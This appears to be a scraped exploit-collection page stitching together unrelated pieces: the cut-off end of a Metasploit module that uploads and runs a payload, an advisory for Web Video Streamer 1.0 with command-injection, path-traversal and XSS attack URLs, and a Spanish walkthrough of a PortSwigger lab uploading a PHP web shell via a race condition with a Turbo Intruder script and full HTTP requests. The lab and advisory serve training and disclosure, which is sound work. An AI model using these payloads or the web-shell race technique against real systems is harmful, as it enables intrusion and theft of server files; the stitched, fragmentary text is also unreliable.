						print_error("Connection timed out.")
						return Exploit::CheckCode::Unknown
					end

					if resp and resp.code == 200 
						print_status('Executing payload...') 
						upload_uri = normalize_uri("/upload/" + payload_name)
						send_request_cgi({
							'uri'    => upload_uri,
							'method' => 'GET'
						},5)

						unless resp
							print_error("Connection timed out.")
							return Exploit::CheckCode::Unknown
						end

						if resp and resp.code != 200
							print_error("Failed to upload")
						end

					else
						print_error("Failed to upload")
					end
				else
					print_error("Authentication failed")
				end
			
		else
			print_error "Error obtaining credentails"
		end
	end
end
HireHackking 
source: https://www.securityfocus.com/bid/65350/info

Web Video Streamer is prone to following multiple security vulnerabilities:

1. Multiple cross-site scripting vulnerabilities
2. A directory-traversal vulnerability
3. A command-injection vulnerability

A remote attacker can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and gain access to sensitive information, which may aid in launching further attacks.

Web Video Streamer 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/webstreamer-master/player.php?name=drops.avi&file=drop.avi';ls>/tmp/foo;a'&type=video/mp4&t=1389685059
http://www.example.com/webstreamer-master/index.php?dir=../../../ XSS:
http://www.example.com/webstreamer-master/player.php?name=%3Cscript%3Ealert%281%29%3C/script%3Etest
http://www.example.com/webstreamer-master/index.php?dir=../../%3Cscript%3Ealert%281%29%3C/script%3E
HireHackking

En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Web shell upload via race condition”.

image 154

Para resolver el laboratorio tenemos que subir un archivo PHP que lea y nos muestre el contenido del archivo /home/carlos/secret. Ya que para demostrar que hemos completado el laboratorio, deberemos introducir el contenido de este archivo.

Además, el servidor tiene una gran defensa ante la subida de archivos maliciosos, por lo que tendremos que explotar una race condition.

En este caso, el propio laboratorio nos proporciona una cuenta para iniciar sesión, por lo que vamos a hacerlo:

image 155
image 156

Una vez hemos iniciado sesión, nos encontramos con el perfil de la cuenta:

image 157

Como podemos ver, tenemos una opción para subir archivos, y concretamente parece ser que se trata de actualizar el avatar del perfil. Vamos a intentar aprovecharnos de esta opción para subir el siguiente archivo PHP:

image 158

Antes que nada, vamos a preparar Burp Suite para que intercepte la petición:

image 159
image 160

Una vez tenemos Burp Suite listo junto al proxy, seleccionamos el archivo y le damos a “Upload”:

image 161
image 162
image 163

Aquí Burp Suite interceptará la petición de subida del archivo:

image 164

Teniendo la petición, vamos a moverla al repeater para poder ver la respuesta por parte del servidor:

image 165

Como vemos, nos indica que solo permite archivos JPG y PNG. Además, el laboratorio nos indicaba que hay una gran defensa por parte del servidor, por lo que no tiene pinta que vaya funcionar ninguno de los métodos visto en los otros laboratorios.

En este caso, lo que vamos a explotar es un race condition. Esto, básicamente consiste en que cuando enviamos un archivo que el servidor no permite, cuando lo enviamos, realmente este archivo se sube al servidor, lo que pasa que milisegundos después, el servidor compara el archivo con las sanitizaciones que tenga configuradas, y si no cumple alguna, lo elimina. Pero durante un mini periodo de tiempo, este archivo se mantiene en el servidor subido.

Para explotar esto, vamos a hacer uso de la extensión “Turbo Intruder”. La podemos instalar desde el propio burp suite:

image 166

Una vez instalado, nos vamos a la petición que habiamos interceptado y mandado al repeater y le damos click derecho para mandarlo al turbo intruder:

image 167

Se nos abrirá una pestaña como la siguiente:

image 168

Básicamente en la parte superior tenemos nuestra petición, y en la inferior, tenemos por así decirlo la programación de lo que queremos que haga la extensión.

La idea, va a ser usar el siguiente código, por lo que toda la parte inferior del código por defecto, la eliminamos y la sustituimos por lo siguiente:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    request1 = '''<YOUR-POST-REQUEST>'''

    request2 = '''<YOUR-GET-REQUEST>'''

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    engine.queue(request1, gate='race1')
    for x in range(5):
        engine.queue(request2, gate='race1')

    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)
image 169

La idea es que, la extensión va a hacer la petición POST subiendo el archivo PHP, e inmediatamente, va a realizar 5 peticiones GET a la ruta absoluta de donde se subirá el archivo. De tal forma, que quizas tenemos la suerte de que alguna de esas 5 peticiones GET se hacen entre el momento donde el archivo se ha subido y el momento donde se ha comprobado y eliminado por parte del servidor, en ese mini espacio de tiempo.

Entendiendo, en el código que acabamos de sustituir, vamos a colocar en la variable request1, la petición POST completa, y en la variable request2, la petición GET completa. Podemos hacer uso del HTTP History para obtener por ejemplo la petición GET:

image 170

La idea, es que el código quede de forma parecida a lo siguiente:

# Find more example scripts at https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/default.py
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    request1 = '''
POST /my-account/avatar HTTP/1.1
Host: ac4b1f5f1e3dd03bc0f834b600e0000b.web-security-academy.net
Cookie: session=JNvosgi2FoKxUcKBOL4y07fao7UWjLLG
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------330791307811450659691420606466
Content-Length: 549
Origin: https://ac4b1f5f1e3dd03bc0f834b600e0000b.web-security-academy.net
Dnt: 1
Referer: https://ac4b1f5f1e3dd03bc0f834b600e0000b.web-security-academy.net/my-account
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------330791307811450659691420606466
Content-Disposition: form-data; name="avatar"; filename="readSecret.php"
Content-Type: application/x-php

<?php echo file_get_contents('/home/carlos/secret'); ?>

-----------------------------330791307811450659691420606466
Content-Disposition: form-data; name="user"

wiener
-----------------------------330791307811450659691420606466
Content-Disposition: form-data; name="csrf"

eNET4DMt9dleHLPIsCZpUeBUCbDs5JQ2
-----------------------------330791307811450659691420606466--

'''

    request2 = '''
GET /files/avatars/readSecret.php HTTP/1.1
Host: ac4b1f5f1e3dd03bc0f834b600e0000b.web-security-academy.net
Cookie: session=JNvosgi2FoKxUcKBOL4y07fao7UWjLLG
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

'''

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    
    engine.queue(request1, gate='race1')
    for x in range(5):
        engine.queue(request2, gate='race1')

    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

Con esto hecho, empezamos el ataque dándole al botón “Attack” de la parte inferior:

image 171
image 172

Se nos abrirá una nueva venta donde veremos las diferentes peticiones, y si nos fijamos de las 5 peticiones GET, 3 han dado error 404, sin embargo, 2 peticiones han dado 200, por lo que estas dos peticiones se han hecho en el mini espacio del que hablábamos antes. Al mismo tiempo, si clickamos en una de ellas, podemos la salida del código PHP interpretado, dicho de otra forma, el contenido del archivo secret.

Con esto, enviamos la solución:

image 173
image 174

Y de esta forma, completamos el laboratorio:

image 175
image 176

Enlaces de interés:

  • Race Condition – Hacktricks
  • HackerOne Report
  • HackerOne Report
  • Race Conditions Exploring the Possibilities